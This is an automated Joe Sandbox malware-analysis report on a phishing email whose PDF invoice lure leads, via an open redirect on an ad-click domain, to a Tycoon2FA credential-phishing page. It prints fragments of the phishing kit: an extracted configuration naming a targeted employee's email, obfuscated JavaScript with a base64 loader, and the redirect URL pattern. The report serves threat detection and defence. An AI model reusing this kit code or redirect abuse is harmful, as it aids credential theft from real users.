Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.eml

Overview

General Information

Sample name:437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.eml
Analysis ID:1640942
MD5:17704fbe421ef93ce3619f9952467a85
SHA1:a0be43765ecb8e5cdf1d90a3763aaf40c3cf9e5b
SHA256:6abd2f711bcd75820d9eec05afa009bf0a821fa1b0038d8a63621f2371866bd1
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Found malware configuration
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
Detected use of open redirect vulnerability
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores large binary data to the registry
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 7128 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\437cb98f-02e6-3095-7a14-f6ed0fcbd9b6.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6196 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A8B1DF91-FAA1-4626-8EBB-BE10763A7B74" "55A4E9CA-0F78-426E-87F2-28A0B4618F5B" "7128" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • Acrobat.exe (PID: 2272 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H60H1VPO\Due-Invoice-edcodistributing.com.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 6444 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 6440 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1616 --field-trial-handle=1372,i,14397360767861381032,14619791995666054004,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adclick.g.doubleclick.net/pcs/click?ref={{RANDOM_STRING}}&id=Y41515N2435yMX419snVO7695-2024-McWAN324SCAN&token={{RANDOM_STRING}}&adurl=https%3A%2F%2Fadclick.g.doubleclick.net%2Fpcs%2Fclick%3Fref%3D{{RANDOM_STRING}}%26id%3DY41515N2435yMX419snVO7695-2024-McWAN324SCAN%26adurl%3Dhttps%3A%2F%2F2025_Notificationx1Invoice_Review.fmhjhctk.ru%2FaNAtEaDInodo%2F%23Yjohng@edcodistributing.com MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,15469999777749754854,18021194746910479268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Configuration

Threatname: Tycoon2FA

{"websitenames": "[\"godaddy\", \"okta\"]", "bes": "[\"Apple.com\",\"Netflix.com\"]", "pes": "[\"https:\\/\\/t.me\\/\",\"https:\\/\\/t.com\\/\",\"t.me\\/\",\"https:\\/\\/t.me.com\\/\",\"t.me.com\\/\",\"t.me@\",\"https:\\/\\/t.me@\",\"https:\\/\\/t.me\",\"https:\\/\\/t.com\",\"t.me\",\"https:\\/\\/t.me.com\",\"t.me.com\",\"t.me\\/@\",\"https:\\/\\/t.me\\/@\",\"https:\\/\\/t.me@\\/\",\"t.me@\\/\",\"https:\\/\\/www.telegram.me\\/\",\"https:\\/\\/www.telegram.me\"]", "capnum": "1", "appnum": "1", "pvn": "0", "view": "", "pagelinkval": "OT1xVD", "emailcheck": "johng@edcodistributing.com", "webname": "rtrim(/web8/, '/')", "urlo": "/qxQ4HAEDWuhosbVQ1dW6HqvLQzGIwgJj7Hg4HAJk0Df36BLVjCV9Mhx"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_191JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    dropped/chromecache_204JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security

      HTML

      SourceRuleDescriptionAuthorStrings
      0.1.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
        0.9.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
          3.26..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            3.25.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
              3.25.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
                Click to see the 30 entries

                Sigma Signatures

                Sigma detected: Office Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
                Sigma detected: Outlook Security Settings Updated - Registry
                Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\H60H1VPO\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 1.16.d.script.csvMalware Configuration Extractor: Tycoon2FA {"websitenames": "[\"godaddy\", \"okta\"]", "bes": "[\"Apple.com\",\"Netflix.com\"]", "pes": "[\"https:\\/\\/t.me\\/\",\"https:\\/\\/t.com\\/\",\"t.me\\/\",\"https:\\/\\/t.me.com\\/\",\"t.me.com\\/\",\"t.me@\",\"https:\\/\\/t.me@\",\"https:\\/\\/t.me\",\"https:\\/\\/t.com\",\"t.me\",\"https:\\/\\/t.me.com\",\"t.me.com\",\"t.me\\/@\",\"https:\\/\\/t.me\\/@\",\"https:\\/\\/t.me@\\/\",\"t.me@\\/\",\"https:\\/\\/www.telegram.me\\/\",\"https:\\/\\/www.telegram.me\"]", "capnum": "1", "appnum": "1", "pvn": "0", "view": "", "pagelinkval": "OT1xVD", "emailcheck": "johng@edcodistributing.com", "webname": "rtrim(/web8/, '/')", "urlo": "/qxQ4HAEDWuhosbVQ1dW6HqvLQzGIwgJj7Hg4HAJk0Df36BLVjCV9Mhx"}

                Phishing

                barindex
                AI detected phishing page
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKJoe Sandbox AI: Score: 9 Reasons: The URL '2025_notificationx1invoice_review.fmhjhctk.ru' does not match the legitimate domain 'microsoft.com'., The domain 'fmhjhctk.ru' is unrelated to Microsoft and uses a Russian domain extension, which is unusual for a Microsoft-related service., The URL contains suspicious elements such as 'notificationx1invoice_review', which are often used in phishing attempts to create urgency or mimic legitimate notifications., The use of a subdomain and the structure of the URL suggest an attempt to deceive users into thinking it is a legitimate notification from Microsoft., The email domain 'edcodistributing.com' does not match the brand 'Microsoft', which raises further suspicion. DOM: 1.3.pages.csv
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKJoe Sandbox AI: Score: 9 Reasons: The URL '2025_notificationx1invoice_review.fmhjhctk.ru' does not match the legitimate domain 'microsoft.com'., The domain 'fmhjhctk.ru' is unrelated to Microsoft and uses a Russian domain extension, which is unusual for Microsoft., The URL contains suspicious elements such as 'notificationx1invoice_review', which are not typical for Microsoft., The use of a subdomain and unusual domain extension suggests a phishing attempt., The brand 'Microsoft' is well-known and typically associated with 'microsoft.com'. DOM: 1.4.pages.csv
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBK#Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL '2025_notificationx1invoice_review.fmhjhctk.ru' does not match the legitimate domain for Microsoft., The URL contains suspicious elements such as a long subdomain and an unusual domain extension '.ru', which is not typically associated with Microsoft., The presence of a Russian domain extension '.ru' is unusual for a Microsoft-related site, especially given the context of an invoice review., The URL structure suggests a phishing attempt, as it includes misleading terms like 'notification' and 'invoice_review' which are commonly used in phishing schemes. DOM: 2.5.pages.csv
                Yara detected HtmlPhish10
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 2.5.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.pages.csv, type: HTML
                Yara detected HtmlPhish44
                Source: Yara matchFile source: dropped/chromecache_191, type: DROPPED
                Yara detected Invisible JS
                Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.23.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.6.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Yara detected Obfuscation Via HangulCharacter
                Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.23.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.20..script.csv, type: HTML
                Source: Yara matchFile source: 3.6.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: dropped/chromecache_204, type: DROPPED
                Yara detected Tycoon 2FA PaaS
                Source: Yara matchFile source: 1.16.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.9.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.26..script.csv, type: HTML
                Source: Yara matchFile source: 3.25.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.6..script.csv, type: HTML
                Source: Yara matchFile source: 1.11..script.csv, type: HTML
                Source: Yara matchFile source: 1.12..script.csv, type: HTML
                Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
                Source: Yara matchFile source: 3.6.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 2.5.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.pages.csv, type: HTML
                AI detected landing page (webpage, office document or email)
                Source: PDF documentJoe Sandbox AI: PDF document contains QR code
                AI detected suspicious Javascript
                Source: 0.0.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, preventing right-click context menus, and redirecting the user to an unrelated website. These behaviors are highly suspicious and indicate potential malicious intent, such as preventing the user from interacting with the page or redirecting them to a phishing site.
                Source: 1.11..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2025_notificationx1invoice_review.fmhjhctk... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, blocks keyboard shortcuts, disables right-click context menus, and redirects the user to an external website. These behaviors are highly suspicious and indicate potential malicious intent.
                Source: 0.9.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, preventing right-click context menus, and using a debugger-based technique to redirect the user to an external website. These behaviors are highly suspicious and indicate potential malicious intent, such as preventing user interaction and redirecting to a potentially malicious domain.
                Source: 0.8..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2025_notificationx1invoice_review.fmhjhctk... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code and the presence of a debugger statement further increase the risk. Overall, this script exhibits a high level of malicious intent and should be considered a significant security threat.
                Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2025_notificationx1invoice_review.fmhjhctk... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob` and `decodeURIComponent` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be interacting with an untrusted domain, further increasing the risk. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
                Source: 1.12..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://2025_notificationx1invoice_review.fmhjhctk... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It checks for the presence of web automation tools, redirects to a suspicious domain, and implements keylogging functionality to intercept user input. These behaviors are highly indicative of malicious intent, warranting a high-risk score.
                Source: 0.1.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behaviors, including dynamic code execution through the use of `eval()` and obfuscated code. The script appears to be attempting to execute remote or malicious code, which poses a significant security risk. This should be considered a high-risk script that requires immediate investigation and remediation.
                AI detected suspicious elements in Email content
                Source: EmailJoe Sandbox AI: Detected potential phishing email: Sender email domain (cup.ocn.ne.jp) doesn't match the claimed business domain (edcodistributing.com). Generic sender name 'e-Invoice_Overdue_Confirmation126' is suspicious and follows common phishing patterns. Creates urgency with immediate payment deadline and threat of late fees
                AI detected suspicious elements in Email header
                Source: EmailJoe Sandbox AI: Detected suspicious elements in Email header: High SCL (Spam Confidence Level) of 8 in x-forefront-antispam-report. Suspicious routing with localhost [127.0.0.1] connection from unknown IP. Japanese IP and infrastructure (OCN) sending English content (language mismatch). CAT:HPHISH in antispam report indicates high-confidence phishing detection. Suspicious IP hop from 149.88.97.195 doesn't match the claimed sending infrastructure. Multiple spam filter triggers indicated in SFS values. Extremely long and suspicious x-microsoft-antispam-message-info header, possibly attempting to evade detection
                Detected use of open redirect vulnerability
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Proxy from: adclick.g.doubleclick.net/pcs/click?ref={{random_string}}&id=y41515n2435ymx419snvo7695-2024-mcwan324scan&adurl=https://2025_notificationx1invoice_review.fmhjhctk.ru/anateadinodo/ to https://2025_notificationx1invoice_review.fmhjhctk.ru/anateadinodo/
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: Number of links: 0
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: <input type="password" .../> found but no <form action="...
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/#Yjohng@edcodistributing.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>AI UI Template</title> <style> body { font-family: 'Segoe UI', Tahoma, Geneva,...
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: Title: Profile Access Sign-In does not match URL
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: Invalid link: Terms of use
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: Invalid link: Privacy & cookies
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: Invalid link: Terms of use
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: Invalid link: Privacy & cookies
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/HTTP Parser: function yzpcwimejl(){tdoewleybg = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagica8bwv0ysbjagfyc2v0psjvveytoci+ciagica8bwv0ysbuyw1lpsj2awv3cg9ydcigy29udgvudd0id2lkdgg9zgv2awnllxdpzhrolcbpbml0awfslxnjywxlpteumci+ciagica8dgl0bgu+qukgvukgvgvtcgxhdgu8l3rpdgxlpgogicagphn0ewxlpgogicagicagigjvzhkgewogicagicagicagicbmb250lwzhbwlsetogj1nlz29lifvjjywgvgfob21hlcbhzw5ldmesifzlcmrhbmesihnhbnmtc2vyawy7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmxytfhmwe7ciagicagicagicagignvbg9yoiajztblmguwowogicagicagicagicbtyxjnaw46ida7ciagicagicagicagihbhzgrpbmc6ida7ciagicagicagicagigxpbmutagvpz2h0oiaxljy7ciagicagicagfqogicagicagighlywrlcib7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmwzdq3yte7ciagicagicagicagihbhzgrpbmc6idiwchg7ciagicagicagicagihrlehqtywxpz246ignlbnrlcjskicagicagicagicagym9yzgvylwjvdhrvbtogmnb4ihnvbglkicm2ngi1zjy7ciagicagicagfqogicagicagighlywrlcibomsb7ciagicagicagicagig1hcmdpbjogmdskicagicagicagicagzm9udc1zaxploiazmnb4owogicagicagicagicbjb2xvcjogi2zmzmzmzjskicagicagicb9ciagicagicagbmf2ihskicagicagicagi...
                Source: anonymous functionHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "ot1xvd";var emailcheck = "johng@edcodistributing.com";var webname = "rtrim(/web8/, '/')";var urlo = "/qxq4haedwuhosbvq1dw6hqvlqzgiwgjj7hg4hajk0df36blvjcv9mhx";var gdf = "/gh3sunqus1lhxx3kwhngna9jr95uvqtgllkelcdzleycd114";var odf = "/ghgtbgtz39qnfg3w0wxocyh8pe9rmfxoze8uhcd650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(u...
                Source: EmailClassification: Invoice Scam
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: <input type="password" .../> found
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: No favicon
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: No favicon
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: No <meta name="author".. found
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: No <meta name="author".. found
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: No <meta name="copyright".. found
                Source: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKHTTP Parser: No <meta name="copyright".. found
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
                Source: unknownHTTPS traffic detected: 142.250.185.162:443 -> 192.168.2.17:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.185.162:443 -> 192.168.2.17:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.17:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.17:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.17:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.17:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.17:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.17:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49748 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.17:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.120:443 -> 192.168.2.17:49763 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.120:443 -> 192.168.2.17:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.17:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.120:443 -> 192.168.2.17:49781 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49784 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.17:49790 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.17:49795 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.49.96:443 -> 192.168.2.17:49797 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.17:49796 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.49.96:443 -> 192.168.2.17:49798 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49812 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49809 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49810 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.253.42:443 -> 192.168.2.17:49808 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.217.16.132:443 -> 192.168.2.17:49817 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49822 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.17:49834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.17:49832 version: TLS 1.2
                Source: global trafficTCP traffic: 192.168.2.17:49827 -> 1.1.1.1:53
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: adclick.g.doubleclick.net to https://2025_notificationx1invoice_review.fmhjhctk.ru/anateadinodo/
                Source: Joe Sandbox ViewIP Address: 13.33.187.14 13.33.187.14
                Source: Joe Sandbox ViewIP Address: 104.16.5.189 104.16.5.189
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
                Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.60
